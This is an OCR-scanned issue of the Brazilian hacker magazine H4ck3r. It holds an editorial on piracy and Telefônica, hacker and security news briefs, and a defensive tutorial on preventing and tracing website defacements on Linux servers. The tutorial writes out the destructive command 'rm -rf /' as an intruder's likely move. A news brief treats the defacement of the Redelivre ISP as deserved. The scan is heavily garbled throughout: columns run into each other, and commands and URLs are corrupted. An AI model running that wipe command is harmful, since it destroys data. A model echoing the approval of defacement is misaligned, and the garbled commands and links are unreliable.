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A gente dá. 


E daí? Vai encarar? 


Internet GRÁTIS e ainda: 


E-Mail GRÁTIS 

100Mb pra sua Home Page GRÁT 
Mp3 GRÁTIS 

Álbum de fotos GRÁTIS 
Downloads GRÁTIS 

O melhor buscador da web GRÁT 


Entendeu porque Ubbi 
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Muito mais que Internet Grátis! 


Grátis? 


EDITORIAL 


ma notícia interessante: juíza decide em favor 

da Telefônica na disputa entre usuários do 

Speedy e a companhia espanhola. Até aqui, não 

há nenhuma novidade. Já deu para sentir o po- 
der e a influência da Telefônica, inclusive na disputa-com a 
Embratel. Mas o que espantou foi a justificativa da juíza para 
essa sentença. Segundo ela, o acesso com velocidade à Internet 
não é serviço necessário e imprescindível à população. 

E depois são os hackers que causam problemas e atrapa- 
lham o desenvolvimento e a popularização da rede no mun- 
do? Se não fossem os sistemas e softwares open source, quanto 
você acha que custaria o Windows? Ou o Office? Caro. 

Outra grande mentira que o pessoal tem contado por aí 
é a respeito da pirataria. Parece que num ranking que 
existe dentro das indústrias de softwares e de mú- 
sica, o Brasil já é o terceiro maior produtor de 

CDs piratas, atrás somente da China e 

Rússia. E os fabricantes exigem empe- 

nho do governo no combate aos 

“pirateiros”. Ao mesmo tempo, a 

Microsoft entra num acordo com 

o governo chinês, em que 

investirá 750 milhões 


de dólares no país para ajudar no desenvolvimento da indús- 
tria local de informática. 

A ordem é a mesma que no resto do mundo: “pirateiem, 
desde que seja o meu software”. Foi assim, aliás, que a MS 
estendeu suas garras pelo mundo. Não é à toa que toda essa 
neurose sobre pirataria só começou, por parte da empresa de 
Redmond, quando o mercado já estava completamente domi- 
nado. E, da mesma forma, a indústria cultural, outra que adora 
ficar reclamando dos piratas, morre de medo da lei que exige a 
numeração dos livros e CDs. Talvez porque exporia as conheci- 
das falcatruas que acontecem no meio. Não são novas as terrí- 
veis histórias de compositores e intérpretes que vivem e mor- 
rem na miséria enquanto suas criações vendem como água. 

Hipocrisia é o que domina esta discussão, não há como duvidar. 

Bom, mas vamos aos destaques da revista. Criamos uma edi- 
ção que aprofunda a edição anterior. Dois tutoriais continuam: 
o de Programação de Socket e o Bugs no ASP/SQL. Na entrevis- 
ta deste mês, tocamos num assunto que só a H4ck3r tem cora- 
gem: falamos com um carder. Na categoria vírus e assemelha- 
dos, fuçamos o ataque DRDoS, uma evolução do já famoso 
DoS. E damos algumas dicas básicas sobre Phreaking, a arte 
hacker mais antiga que existe. E prometemos que este é só 
começo. Afinal, conhecimento é poder. 

Ou será que não? 


O Editor 
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O fima da novela 


Editor da 2600 perde luta na Justiça 


O editor da revista 
2600, uma das mais res- 
peitadas no meio hacker, 
resolveu terminar uma 
novela que já durava 
quase três anos. Ele de- 
sistiu de apelar a senten 
ça que o condenava por 
colocar links em seu site, 
o www.2600. com, levan- 
do para páginas em que 
se podia baixar o DeCSs, 
programa para destravar 
DVDs. 

— Tanto a Corte Distrital 
de Nova lorque como a 
Corte de Apelação já ha- 
viam decidido que Eric 
Corley e sua revista des- 

respeitaram a controversa DMCA (Digital Millenium Copyright 

Act), lei de 1998 que tenta regulamentar os direitos autorais em 

mídias digitais. 

O problema é que, ao desistir, Corley confirma a existência de 
um precedente perigosíssimo na Justiça americana: você pode 
ser processado pelos links que publica em seu site, mesmo que 
não tenha feito nada que desrespeite os direitos autorais. Fazen- 
do uma analogia, é como se o prendessem por informar o ende- 
reço de uma banca de camelôs que vende CDs piratas. Obvia- 
mente, trata-se de uma hipocrisia. E mais uma derrota para a 
liberdade de informação. 


Fora do ar 


Vírus impede micros de acessar o The Register 


Incrível o que não fazem os criadores de worms para chamar a 
atenção da mídia. A mais nova praga da Internet ganhou as páginas 
dos noticiários de tecnologia de todo o mundo, mesmo infectando 
pouquíssimos computadores: 

Atática é simples: criar um código que impeça os micros infectados 
de acessar o site de notícias de informática mais famoso do Reino 
Unido, o 7hc Register. É isso que faz o Gunsan, que, de outra forma, 
seria apenas mais um desses vírus bastante rudimentares que apro- 
veitam falhas no Windows e no Outlook para se espalhar pela Rede. 

Além de alterar a configuração de DNS do micro (para impedir o 
acesso ao site, além de páginas de empresas de antivírus), o Gunsan 
abre um backdoor, permitindo a um hacker controlar a máquina 
remotamente a partir de um canal de IRC. Ele também apaga arqui- 
vos importantes, usados por programas antivírus e firewall. 

Curioso foi o tratamento dado à notícia pelo The Reg. Sempreirônico, 
osite preferiu ser discreto ao falar do assunto. Afinal, se a moda pega... 
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A união faz a força 


Supercomputadores unidos contra o terrorismo 


Depois de ser usado na caça de extraterrestres, na quebra 
de senhas criptográficas e até na busca de uma cura para a 


Eder ita == 


AIDS, o uso de grids de computadores encontrou mais uma 
aplicação nos EUA. Aliás, essa idéia só podia ter surgido lá. Os 
americanos estão com tanto medo do terrorismo que querem 
usar dois dos maiores supercomputadores do mundo para cri- 
ar simulações que os ajudem a se preparar para possíveis 
atentados. 

Os dois computadores em questão são da IBM e estão instalados 
na Universidade de Purdue e na de Indiana, nos EUA. O primeiro 
está em 186º lugar na lista dos 500 maiores supercomputadores do 
mundo. Tem 256 processadores e capacidade de processamento de 
257 Gflops. Já o computador de Indiana, posicionado em 78º lugar 
na mesma lista, tem 508 processadores e 534 Gflops. 

O que o governo dos EUA quer é estudar reações em casos simu- 
lados de tragédias ocasionadas por atos terroristas. O comporta- 
mento de um milhão de pessoas será reproduzido pelas máquinas, 
usando um software especial. Haja paranóia... 


Censura por uma fio 


cDc lança browser pela liberdade de informação 


Finalmente, depois de quase um ano, um dos 
grupos hackers mais famosos do mundo, o Cult 
of the Dead Cow (Culto da Vaca Morta) lan-- 
çou seu browser anticensura. 

A idéia é ajudar pessoas que acessam a 
Internet em países onde a navegação é restri- 
ta, como China, Cuba, Irã, Iraque e outros. O 
programa se chama Camera/Shy e automatiza 
processos de esteganografia (esconder men- 
sagens em imagens) e criptografia para es- 
conder os textos, possibilitando que eles se- 
jam mandados pela Internet, sem risco de se- 
rem compreendidos sem as devidas chaves. 

O browser é baseado no Internet Explorer, o 
que gerou algumas críticas da comunidade 
hacker. Segundo o cDc, porém, era preciso pensar 


di 


no usuário comum, que costuma usar esse nave- 
gador. O programa usa técnica de estegano- 
grafia LSB e chave de criptografia AES-256 bit. 
Ele também tem ferramentas de segurança con- 
tra códigos maliciosos em HTML. Para instalá-lo, é 
necessário ter uma versão do Windows e do IE, a 
partir do 5. 
O lançamento é o primeiro programa do 
grupo Hacktivismo, patrocinado pelo cDc. 


www.cultdeadcow.com 


É o fundo do poço 
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Microsoft distribui vírus 


Agora foi demais... A Microsoft distribuiu um dos vírus mais 
destrutivos dos últimos tempos, o Nimda, em seu próprio progra- 
ma! A falha foi no pacote de desenvolvimento do Visual Studio 
-Net, na versão traduzida para o coreano. 

A empresa garante que nenhum computador foi infectado, por- 
que o virus só pode ser executado com o IE 5.5 ou inferior, enquan- 
to que o Visual Studio necessita do IE 6. Além disso, o arquivo 
adicionado pelo vírus no help do programa é difícil de ser acessado. 

Mesmo assim, a falha é impressionante. Como um programa 
pode sair da fábrica da maior empresa de software do mundo 
sem uma minuciosa avaliação contra a presença de vírus no 
sistema? A Microsoft reconhece isso e diz que houve uma fa- 
lha: apenas alguns arquivos no programa foram analisados quan- 
do ele voltou do processo de tradução, em uma empresa con- 
tratada. Mas todos os arquivos presentes deveriam ter sido 
verificados. 

A pergunta é: como confiar que um Office ou mesmo o próprio 
Windows não chegará até nós repleto de vírus? 

“ 


Norton Antivirus E TA 
TAN Norton Antivirus has detected the W32, Nimda, Amen(html) virus in: 


File Nome: CDocuments and Settings AdministratoriLocal SettingsiTemporary. 
Internet FilesiContent.IES|BOMHBZK9iaspngogl 1]. htm. 

Domain Name: WORKGROUP 

System Name: GATEWAY-NPMS2BO 

User Name: Administrator 

The file was repaired, 


> 


Ea 


DEMMOTOU... 


Site do Redelivre é invadido 


Não queremos incentivar invasões a sites, mas bem que o prove- 
dor Redelivre estava pedindo. Depois de deixar seus clientes na mão, 
sem conexão durante dias, com a confusão envolvendo a Telemar, 
o provedor 0800 fez a mesma coisa durante a parceria com a 
Embratel. Um absurdo, já que a mensalidade é pré-paga. E, pra 
piorar (ainda com a Embratel, sob liminar, depois de passar pela 
Intelig), mudou seu plano de pagamento, antes com acesso ilimita- 
do, para um sistema de créditos com preços até três vezes mais 
caros que o anterior 

Resultado: site invadido. Durante dias, podia-se entrar no 
wwyw.redelivre.com.br e ver a mensagem de um usuário, de nick 
Find3r (o espelho pode ser visto no site www. delta5.com.bp). 

Entre outras pérolas, ele chamou o provedor de “Rede Prisão de 
Ventre” e pediu que o serviço voltasse para o modelo antigo. 

Só que, aparentemente, isso não vai acontecer. Se for verdade 
que o provedor não conseguia pagar as companhias telefônicas, 
essa deve ter sido a maneira encontrada para que a Intelig tivesse a 
garantia de que, agora sim, irá receber. 


Uma mova esperança 


Hope chega à sua quarta edição 


Ainda está longe de ser um evento com o glamour de uma DefCon, 


ano, a derrota no processo foi tema obrigatório no evento. 


Biafra, ex-líder do grupo Dead Kennedys, ativista social e principal pa 
2000. Entre outras coisas, ele falou sobre música, censura e ex| 
corporações. 


Dois anos depois, está de volta a conferência Hope (Hackers On Planet Earth), organizada 
pela 2600 magazine, uma das mais cultuadas revistas hackers do mundo. 
O nome, desta vez lembrando a convenção de 2000, foi H2K2 (em 2000, o nome foi H2K). 


Assim como esta última fei muito falada, depois da prisão de um de seus palestrantes, Dmitry 
Sklyarov, em 2001, a Hope também ganhou notoriedade com o processo movido pela indús- 
tria do cinema contra a 2600 pela divulgação do DeCSS (programa para quebrar DVDS). Este 


Sediada, como sempre, em Nova lorque, a H2K2 teve palestras importantes, abordando 
temas como esteganografia, ética e propriedade intelectual. O keynote speaker foi Jello 


mas está chegando lá. 


estrante do evento em 
ploração das grandes 


Jello Biafra, 
keynote da H2k2 


tan? 


Hackers ema alta 


Atividade cresceu 64% em um ano 


O mundo hacker nunca esteve tão 
em alta. Um estudo feito pela Riptech 
concluiu que o número de ataques a em- 
presas cresceu 64% em apenas um ano. 

O número de tentativas de invasão en- 

contrado no primeiro semestre deste ano foi 
de 180 mil (entre mais de um milhão não 
confirmadas), contra 160 mil no segundo 
semestre do ano passado. O dado mais in- 
teressante é o que aponta os países com maior atividade hacker. 
São, na ordem, EUA, Alemanha, Coréia do Sul, China, França, Ca- 
nadá, Itália, Taiwan, Reino Unido e Japão. Esses países respondem, 
sozinhos, por 80% dos ataques (e os EUA, por 40%). 

Daí, perguntamos: onde está o Brasil? Afinal, somos apontados 
como um dos países com maior quantidade e qualidade em 
hackerismo. A explicação pode ser simples: a pesquisa não aponta 
se o ranking de países foi feito com base nas empresas invadidas ou 
na origem dos ataques. Se for a primeira opção, fica tudo explica- 
do, já que são pouquíssimas as empresas brasileiras invadidas. O alvo 
preferencial são sempre os EUA. 


s2sepIo Ç 9 
jPEGs infectados? 
Polêmica confunde especialistas em segurança 


Imagine o que aconteceria se todos os arquivos 
de dados, como texto, imagens, música, 
vídeo, etc., pudessem estar repletos de vi- 
rus, prontos para serem executados. Até 
hoje, só arquivos de programas podiam 
conter vírus. 
Se isso realmente acontecesse, seria 
o caos. Incontáveis arquivos JPEG, GIF 
ou MP3, alguns dos formatos mais po- 
pulares da Web, seriam infectados. E 
esse medo tornou-se a mais nova arma 
das empresas de antivírus para fazer ter- 
rorismo sobre os usuários de computado- 
res. A McAfee, uma das maiores empre- 
sas desse mercado, anunciou a existência 
do primeiro virus capaz de infectar um JPEG. 
Chamado Perrun, o worm seria capaz de se 
espalhar dentro de um arquivo de imagem. Um 
componente extrator, localizado no compu- 
tador infectado, retiraria o vírus e o execu- 
taria. A imagem em si, em um computador 


Revista H4ck3r mo IRC 


Troque informações no canal da revista 


Troque informações com os leitores da revista H4ck3r. Você que 
tem acesso ao IRC não deixe de entrar e conhecer o canal da revista 
da elite digital. Desenvolvemos esse canal a fim de trocar informa- 
ções de uma maneira mais fácil e relativa. Além de saber das novida- 
des da revista, sendo que muitos têm acesso ao IRC, é um jeito de 
conhecer novas pessoas e aprimorar seus conhecimentos. Para 
acessar o canal, entre no servidor IRC da BRASnet, irc.brasnet.org, 


sem o componente extrator, não faria mal 

algum à máquina. Justamente por isso, o 

vírus tem baixíssimas chances de se pro- 
pagar. 

Nada a ver com o fim do mundo 
anunciado pelas empresas interessadas. 
Como se elas não costumassem fazer 

isso sempre. 


no canal Zhackermagazine. 


Assédio corporativo 


Microsoft “ataca” open source em duas frentes 


Se você é um daqueles que costumam brincar com a clássica 
frase: “a Microsoft quer dominar o mundo”, talvez esteja na hora 
de rever seus conceitos. Isto porque o apetite por consumidores, 
mercados e patentes da' empresa, reconhecidamente voraz, está 
cada vez mais evidente e já começa a se virar para o open source. 
Portanto, a brincadeira pode ser coisa bem séria. 

As duas últimas investidas de Tio Bill foram bem diferentes: uma 
foi “amigável” e a outra, mais radical. Comecemos pela pior: al- 
guém aí já ouviu falar do OpenGL? Se você trabalha com arte digital 
com certeza já, pois o OpenGL é uma interface de programação 
que permite criar gráficos 2D e 
3D com extrema perfeição. E é 
open source, como o próprio 
nome diz. 

Só que a Microsoft já resol- 
veu embaçar o desenvolvimen- 
to do padrão, que pode passar 
a ter uma licença com mais res- 
trições devido a patentes que a 
gigante de Redmond reclama 
ter. A empresa teria direitos in- 
telectuais sobre uma tecnologia 
chamada vertex programming, 


que possibilita maior controle dos desenvolvedores sobre as aplica- 
ções 3D, e de uma outra importante personagem do OpenGL, a 
fragment shading, o que perturbou o OpenGL Architectural Review 
Board (ARB), entidade responsável pelas especificações da interface. 

A segunda investida, mais serena, refere-se à presença de um 
estande da Microsoft na LinuxWorld, de agosto deste ano. A novida- 
de, que chega a parecer provocação, gerou diferentes reações na 
comunidade do código aberto, mas uma boa parte concluiu o óbvio: 
Bill Gates quer ganhar mais dinheiro, seja apresentando seus produ- 
tos como opção, seit, marcando presença junto a um público consu- 
midor em potencial. 

Para os mais românticos, que 
veriam aí uma aproximação da 
gigante rumo à liberdade de ex- 
pressão, um aviso: a própria 
companhia descartou a possibi- 
lidade, por meio do diretor do 
grupo de servidores da empre- 
sa, Peter Houston. Segundo a 
empresa, a iniciativa busca uma 
“proximidade” com o pessoal do 
open source. Mas cá entre nós: 
dá para acreditar? 


Imagens: Divulgação/Reprodução 


O aguardado Mozilla LO já 


chega com bug; 


Mas software, mesmo com falhas, consegue agradar usuários 


Finalmente, depois de quatro anos de desenvolvimento, foi lançada 
a versão 1.0 do navegador Mozilla, projeto open source “irmão” do 
Navigator, da Netscape. 

Mas tanto cuidado não foi su- 
ficiente para evitar um proble- 
ma: o programa nem bem saiu, 
e já havia notícias sobre falhas 
capazes de gerar um ataque de 
DoS no computador em que o 
Mozilla estivesse instalado. Ra- 
pidamente, o grupo que desen- 


muzilla. 


ee Ap ça 
“our bleeding edge alpha 
release no o vid: Dr al 
dhe changes that happened ca the tr since sre 
trash fr Monta 10 See he releae pot 


igual ao Netscape. O lançamento era tão aguardado que houve 
comemoração em diversas partes do Brasil e do mundo, durante 
quase uma semana. 
O Mozilla dá um banho no 
DT Internet Explorer, com progra- 
ma de e-mail embutido, desen- 
Dame Mc pao ECO volvimento de sites, chats, blo- 
queio de cookies e de janelas 
que se abrem sem solicitação 
(pop-ups). O único problema é 
que ele é mais lento para carre- 


volve o software colocou no ar 


gar páginas, mesmo consumin- 


um patch para corrigir o bug, 
mas ficou um clima de constran- 
gimento. 

De qualquer forma, o pro- 
grama agradou os usuários, 
mesmo sendo basicamente 
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do menos memória. 


Quem quiser baixar o 
navegador, deve ir ao site 


www.mozilla.org/releases 


Giz de guerra? 


Símbolos em calçada ajudam a hackear redes wireless 


Qual é a novidade no mundo hacker? Invadir páginas, usar 
exploits em programas Wifidows ou servidores Apache, usar fake 
mail, phreaking... Tudo isso está longe de ser novo. Fica difícil 
achar algo que realmente surpreenda. Mas nós achamos. A últi- 
ma invenção dos hackers é uma nova simbologia aplicada para a 
invasão a sistemas wireless. 

Trata-se do Warchalk, que está se tornando mania na Ingla- 
terra. Já que é só usar um tubo de batata Pringles para invadir 
uma rede wireless, basta anotar no chão das cidades em que há 
pontos de conexão próximos, para que a brincadeira fique ainda 
mais fácil. 

Os sinais usados, até o momento, são apenas três. Um para 
nós abertos, outro para nós fechados e o terceiro para nós em 
redes internas. No site do projeto, há uma sugestão para mais 
um, o nó voluntário (para quem quiser compartilhar seu ponto 
de conexão) —, mas o desenho ficou, digáfrros, estranho... 

A idéia já chegou à França com força total. E já foi rebatizada, 
como acontece com tudo que chega em inglês por lá: é o 
Craiefiti. Aos poucos, o Warchalk está chegando também nos 
Estados Unidos. 


À esquerda, o estranho 
símbolo para quem 
gostade “compartilhar” 
sua conexão 
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Egoismmo sera fio 


Operadoras de DSL se irritam com clientes socialistas 
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Um dos maiores atrativos do Wi-Fi, tipo de rede wireless bastante empregada em 
empresas (veja matéria na p. 18), é a possibilidade de compartilhar conexões da 
Web com outras pessoas, o que tem dado dor de cabeça para os serviços de banda 
larga. Acontece que alguns usuários, mais espertos e criativos, aprenderam a ins- 
talar antenas wireless em suas máquinas e usá-las para dividir o desfrute da DSL 
com seus amigos. 

Ótima pedida. Mas não para as operadoras DSL, que atendem vários acessos que 
não são de clientes e já começam a reclamar do tráfego sobrecarregado em suas 
centrais. Tanto que agora resolveram se voltar contra o Wi-Fi e sugerir gentilmente a 
seus assinantes que sejam egoístas e não dividam suas conexões nem com a própria 
mãe (tá, exageramos um pouco, mas é por aí...). As medidas ainda podem incluir 
sistemas de detecção de ligações “clandestinas”. 

Tudo isso parece meio distante do Brasil, já que por estas bandas se nem a DSL é 
assim tão comum, que dirá as redes compartilhadas sem fio. Mas vale a pena abrir o 
olho e ficar esperto se alguém começar a importar as idéias. Entre as inimigas da 
antena estão a Time Warner Cable, a AT&T ea TWC. 


Braziliams: get out 
Netcraft esclarece “bloqueio continental” 


Frustrado com o bloqueio que a Netcraft (H4ck3r & 1), conhecido 
serviço identificador dê servidores, impôs aos brasileiros? Pode chorar, 
gritar e estrebuchar à vontade, porque não há força que consiga 
convencer os gringos a mudar de idéia, ao menos por enquanto — 
embora o povo já tenha achado algumas formas de burlar o sistema. 

Só que, atendendo à enxurrada de e-mails que cobram uma 
explicação há meses, a Netcraft ao menos resolveu dar sua versão 
dos fatos. A resposta veio por intermédio de Fredrik Óstergren, 
responsável pelo Alldas.org, que tem parceria com o serviço. Segun- 
do ele, a Netcraft disse que havia muitos bots (programas que 
automatizam tarefas, comuns no IRC) fazendo download de mate- 
rial do site, o que sobrecarregava o servidor. 

Como as conexões partiam de vários IPs brasileiros e eram difíceis 
de barrar, o negócio foi apelar pra grosseria e proibir todo mundo 
de entrar na bagaça. A explicação pode reforçar a suspeita de que 
a origem do problema sejam os defacers, especialmente os script 
kiddies, que podem ter programado bots para acessar continua- 
mente o serviço, em busca de servidores vulneráveis. Legal, só que 
até segunda ordem as coisas ficam como estão. Fazer o quê? 


Hacker do milhão 


Guilherme Amorim tinha conta com R$ 3 milhões 


O hacker brasileiro, Guilherme 
Amorim, foi mais longe do que 
todos imaginavam. Dias depois 
de ser preso pela Polícia Fe- 
deral, no Mato Grosso do 
Sul, descobriu-se que ele tem 


de R$ 3 milhões. Aos 18 anos, 
ele passa a ser protagonista do 
maior caso de invasão a bancos já 
registrado no Brasil. 

A polícia, até o fechamento da re- 
vista, já tinha comprovado o desvio de 
R$ 120 mil, em 50 contas de vários esta- 
dos brasileiros. Até o FBI entrará na investigação. 
Foram descobertos, no computador de Guilherme, os dados 
cadastrais de 3.500 clientes de uma empresa de cartão de cré- 
dito internacional. 

Guilherme foi preso em flagrante 
invadindo o site de um banco. 
Logo depois, foi solto por ordem 
judicial. Em conversas virtuais 
com outros hackers, ele também 
falava sobre lavagem de dinhei- 
ro e compra de armas. 

O caso mostra em que situação 
se encontra a segurança dos ban- 
cos, no Brasil e na Internet, em geral. 
Ainda estamos longe do dia em que mo- 
vimentar contas bancárias na Rede será 
algo seguro. 


Profecia viral 


Especialista diz que vírus enviará mais e-mails que humanos 


Depois do advento de vírus como Sircam, Nimda e Klez, 
três coisas ficaram bem claras: a capacidade cada vez 
maior que os desenvolvedores de vírus e worms de- 
monstram ter, a inocência que os usuários pare- 
cem nunca perder e a flagrante vulnerabilidade 
da Internet a qualquer ataque do tipo. 

Isso ficou tão evidente que já tem até quem 
preveja que, num futuro próximo, os vírus, e — 
pasmem — não os humanos serão os responsáveis 
pelo envio do maior número de e-mails. A inusitada 
profecia surgiu da boca de Eugene Kaspersky, fun- 
dador da empresa de antivírus que leva seu sobrenome, 
sediada em Moscou. 

Segundo Kaspersky, o crescimento acele- 
rado e a sofisticação dos vírus farão com 


que, em três anos, o volume destes exceda o de e-mails 
legítimos, o que teria consequências desastrosas para 
os negócios on-line. Ele diz que, se somente 2% da 
capacidade da Internet cair, o impacto seria pior 
que o dos atentados de 11 de setembro sobre os 
negócios — e o Klez já conseguiu derrubar 0,5% 
desta capacidade, conforme seus cálculos. 
Para Kaspersky, a saída seria mudar os padrões 
da Internet, e para isso seria necessário que as 
grandes desenvolvedoras se esforçassem para criar 
e fazer valer novos padrões que aumentem a segu- 
rança na Rede, deixando-a menos vulnerável. 
Uma das sugestões é a criação de uma ID, 
semelhante a uma carteira virtual de 
habilitação. Será que funcionaria? 
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RASTREAMENTO 


por Bruno Cesar 
brunoQdigerati.com.br 


Prevenção e rastreamento de ataques 


oucas empresas gastam o que 
deveriam com segurança digital. 
A repercussão é o alto número 
de páginas invadidas e alteradas 
no mundo inteiro. E quem é o maior culpado? 
O administrador do sistema? Não, o maior cul- 
pado disso tudo é quem está acima do admi- 
nistrador, que, na maioria das vezes, prefere 
não investir em seu servidor e espera que o 
administrador faça o resto. Em grande parte 
dos casos, o administrador não tem responsa- 
bilidade de manter seu sistema seguro, mas 
sim de mantê-lo funcionando e configurado. 
É claro que um sistema seguro é um sistema 
bem configurado. Muitas vezes, o próprio ad- 
ministrador tem um alto conhecimento em sis- 
temas operacionais, pois sabe configurá-los e 
mantê-los funcionando, mas não tem o devi- 
do conhecimento na área de segurança de 
novos bugs e novos exploits, e, quando ocorre 
um ataque de qualquer tipo, o primeiro a ser 
crucificado é o administrador. 
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Os Ataques 

Os ataques do tipo alteração de páginas (deface) são e sem- 
pre foram moda por serem ataques fáceis de executar, com um 
grande número de ferramentas (exploits) se espalhando na 
Internet. Tudo se torna mais fácil para o “hacker” executar o 
ataque. Como os ataques deste tipo são os mais usados hoje 
na Internet, mostraremos neste artigo como rastrear um ata- 
que de um defacer. É muito mais fácil do que podemos pen- 
sar, pois deperidendo do ataque, o defacer sempre deixará um 
rastro. Por mais que o ataque seja perfeito, um defacer não 
tem o mesmo conhecimento em sistemas do que um adminis- 
trador, que usará os recursos de seu servidor para efetuar os 
rastreamentos, tanto em sistema e servidores Linux quanto 
Windows. 

ço 

Prevenção 

Antes de pensar em rastrear um ataque, tente se prevenir do 
mesmo. A prevenção ainda é o melhor remédio. Mas como se 
prevenir de um ataque? Veja, abaixo, alguns itens que são 
obrigatórios em todo servidor e que devem ser executados 
pelos administradores: 

— Backups diários 

= Um firewall instalado e bem configurado 

- Atualizações de daemons e patchs de segurança 

- Bloquear daemons que não estão sendo usados 

= Escolher boas senhas 

= Utilizar scans para encontrar possíveis bugs 

= Utilizar um IDS 

= Utilizar analisadores de tráfego 

— Manter-se sempre informado sobre novas vulnerabilidades 


Se o servidor não tiver pessoas aptas a fazer este tipo de 
serviço, contrate uma empresa de segurança. Se estiver dis- 
posto a pagar pelo serviço, é uma ótima opção. Você gasta em 


segurança aquilo que quer proteger. Tente modelar o risco e “ 


defini-lo, de forma que você tenha controle sobre ele, tendo 
um indicador. 


“Tá funcionando, deixa” 

Este é o pensamento de muitos administradores e donos 
de servidores na Internet. Exatamente por isso, a segurança 
não existe nestes casos. Tente pensar da seguinte maneira: 
não basta somente ter um produto funcionando, se, a qual- 
quer momento, ele pode parar de funcionar — por mais que 
o produto seja bom, ele sempre terá um risco que poderá 
ser minimizado. 


Links para prevenção 


Alguns links abaixo são obrigatórios para os security 
officers. São links de sites relacionados à segurança, 
sempre contendo novas vulnerabilidades, bugs e for- 
mas de atacar e se defender. 


BufferOverflow 
htip:siwvww.butferoverflow.com.br 


CERTO Coordination Center 
http:s/iwww.cert.org 


Computer Security 
http:/iwvww.computersecuritynow.com/ 


CORE 
http://www. core-sdi. com 


Common Vulnerabilities and Exposures 
http:/icve.mitre.org/ 


Help Net Security 
http:/net-security.org/ 


Last Stage of Delirium 
http://sd-pl.net” 


SecurityFocus 
http:/iwww.securityfocus. com 


SecForum 
http://www.secforum.com.br 


PacketStorm 
http:/packetstorm.decepticons.org 


TESO Team 
htip://teso.scene.aty 


Underground Security Systems Research 
http://iwww.ussrback.com/ 


Patchs de segurança 

Instalar um patch significa corrigir ou melhorar um serviço 
ou programa. Quando é detectado um novo bug em algum 
programa, a empresa que desenvolveu o mesmo gerará um 
patch de segurança para ser instalado no sistema, corrigindo 
o bug. Ficar atento a novas ocorrências e instalar os mais re- 
centes patchs é uma ótima prevenção. Com sistemas Windows, 
pegue o último service pack para a sua versão, no link: 

http:/hvww.microsoft. com/downloads/ 


No caso do Linux para kernel 2.4.1x, use o patch da 
GRSECURITY, um dos melhores. Neste sistema operacional, a 
última versão instável disponível é a 1.9.5. Para baixá-la, acesse 
o link abaixo: 


sa 


htip:/Awww.grsecurity.nety 


Rastreando um ataque 

Agora, se a arte já foi feita e seu servidor foi atacado, a 
primeira coisa a fazer é tirar seu sistema do ar, esclarecendo 
melhor, desconectar seu servidor da Internet. Dê um boot no 
sistema, fazendo com que intrusos caiam. Tentar rastrear o 
intruso que esteja com posse do seu sistema como usuário 
root é arriscado, mas pode ser uma opção. O máximo que o 
invasor poderá fazer, ao pressentir que está sendo rastreado, é 
dar um “rm -rf /” em seu sistema — se o mesmo utilizar Linux, 
é claro. Veja abaixo exemplos de rastreamentos nos sistemas 
operacionais Linux e Windows. 


Sistema Linux 

No Linux, para encontrar um rastro de uma invasão e chegar, 
assim, ao invasor, é necessário usar o bom senso, pensando como 
se fosse o invasor. O que você faria se estivesse com seu sistema 
operacional nas mãos? Óbvio, você faria de tudo para não perder 
o acesso ao sistema, instalaria algum tipo de backdoor ou até 
mesmo adicionaria um usuário no sistema com privilégio máxi- 
mo. Achar uma backdoor no sistema Linux não é um bicho-de- 
sete-cabeças, ainda mais depois da edição da H4ck3r &2, com a 
matéria “Linux Backdoors”. Mas mesmo com todos estes dados, 
é essencial que você conheça seu sistema, saiba se ele tem dados 
de datas de execuções de arquivos, quais os serviços que estão 
rodando, quais são as portas abertas. Para ver todas as portas 
abertas no sistema, digite o comando abaixo: 

frootODlocalhost /rootJk Isof -i 


Serão listadas todas as portas que estão sendo usadas. Veja 
se encontra alguma porta estranha. 


Procurar por rastros no 
/etclpasswd é obrigatório. 
Adicionar usuários no 
letclpasswd é bem a 
cara de muitos defacers. 


Procurar por rastros no /etc/passwd é obrigatório. Adici- 
onar usuários no /etc/passwd é bem a cara de muitos 
defacers. Portanto, não perca tempo. Tenha em mente to- 
dos os usuários cadastrados no sistema e entre com o co- 
mando abaixo: 

lrootBlocalhost /etcjé grep “:0:0:” fetopasswd 


Serão listados os usuários do sistema. Veja se todos con- 
ferem. Se encontrar algo de estranho, examine. Como exa- 
minar? Use arquivos de logs do sistema — o primeiro arqui- 
vo de log a ser verificado é hash history, o qual conterá os 
1.000 comandos digitados por algum usuário. Por exem- 
plo, no caso de um usuário root, o arquivo hash history se 
encontrará na pasta Zoot. Editando-o com seu editor de 
textos preferido, V/ou pico, você terá uma pequena noção 
do que foi feito em seu sistema e, assim, tentará corrigir. Se 
mesmo assim o log hash history não trouxer informação 
alguma, utilize o comando: 

frootDlocalhost /rootJ& ps -aef lgrep root 


O comando acima procurará por processos executados pelo 
usuário root, que, no caso, poderá ser modificado por qual- 
quer outro usuário. Serão listados os processos iniciados pelo 
usuário root; veja se o mesmo não apresenta algum script 
estranho executado. Com certeza, este passo lhe trará algu- 
mas informações. 


Após isso, você terá que descobrir qual foi a porta de entra- 
da do invasor e qual bug foi usado por ele para explorar seu 
servidor, pois não adianta tirar o acesso do invasor no sistema, 
se este ainda se encontra bugado. Esse passo é demorado e 
exigirá um pouco de paciência. Comece pelos daemons, que 
são os softwares mais explorados para ter acesso ao seu siste- 
ma, como servidores FTP, IMAP, BIND. Todos são serviços utili- 
zados pelo Linux que poderão ser facilmente explorados re- 
motamente pelo invasor. Para proteger-se de um ataque desse 
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tipo, mantenha seus serviços com softwares atualizados e bem 

configurados, e sempre que possível utilize um scanner de 

segurança. Recomendo o Nsat: 
htip://sourceforge.netprojects/nsat 

SysLog ! 

Quase tudo que acontece em um sistema Linux é gravado 
no syslog, pois todo e qualquer programa pode gerar um log 
deste tipo, que será enviado para o syslogd. O syslogd deve 
ser configurado de maneira que tudo possa ser gravado em 
disco. O seu arquivo de configuração se encontra em Zeta” 
syslog.conf . Configure o syslog como descrito abaixo: 

Er /varlog/syslog 


E 

Assim, O sistema estará configurado para gravar todo tipo 
de log, até mesmo um log de uma conexão remota, a partir de 
um serviço de shell. 


Logs no Apache 

fustilocalapachellogs 

Os logs gerados pelo Apache são uma grande arma con- 
tra o invasor, por serem precisos. Um exemplo disso: quan- 
do o invasor altera uma página, ele sempre entrará nela 
para ver o seu feito. Quando ele entrar e visualizar a página, 
o Apache gravará a hora, data e IP do mesmo, ficando fácil 
descobrir quando o arquivo da página principal foi altera- 
do e, logo depois, o acesso foi feito. Com certeza, o acesso 
feito é do invasor. 


Tcpdump 

Tcpdump é uma ferramenta de captura de pacotes, que, 
estando ativo no sistema, irá interceptar e avaliar os pacotes 
recebidos. O comando abaixo pode executar o software em 
uma operação de interceptação sem filtragem, sendo exibido 
o resultado na terminal: 

frootQlocalhost étgpdump 

